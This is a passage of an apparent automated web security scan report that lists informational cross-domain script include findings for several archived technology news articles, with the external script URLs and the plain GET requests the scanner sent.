http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.310. http://technolog.msnbc.redacted/_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.311. http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing-

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing- HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.312. http://technolog.msnbc.redacted/_news/2010/08/26/4975799-big-facebook-sues-little-teachbook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/26/4975799-big-facebook-sues-little-teachbook

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2010/08/26/4975799-big-facebook-sues-little-teachbook HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.313. http://technolog.msnbc.redacted/_news/2010/08/26/4977002-gmail-calling-takes-off-but-not-without-bumps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/26/4977002-gmail-calling-takes-off-but-not-without-bumps

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2010/08/26/4977002-gmail-calling-takes-off-but-not-without-bumps HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.314. http://technolog.msnbc.redacted/_news/2010/08/27/4982716-older-adults-are-flocking-to-social-networks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/27/4982716-older-adults-are-flocking-to-social-networks

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2010/08/27/4982716-older-adults-are-flocking-to-social-networks HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.315. http://technolog.msnbc.redacted/_news/2010/08/30/5001169-google-may-start-pay-per-view-movies-on-youtube previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/30/5001169-google-may-start-pay-per-view-movies-on-youtube

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2010/08/30/5001169-google-may-start-pay-per-view-movies-on-youtube HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.316. http://technolog.msnbc.redacted/_news/2010/08/30/5001506-nintendo-drops-dsi-and-dsi-xl-prices-20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/30/5001506-nintendo-drops-dsi-and-dsi-xl-prices-20

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/9d96c8b3032770da5152df3c93298ef8d7e4320a.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2010/08/30/5001506-nintendo-drops-dsi-and-dsi-xl-prices-20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.317. http://technolog.msnbc.redacted/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.318. http://technolog.msnbc.redacted/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.319. http://technolog.msnbc.redacted/_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.320. http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.321. http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
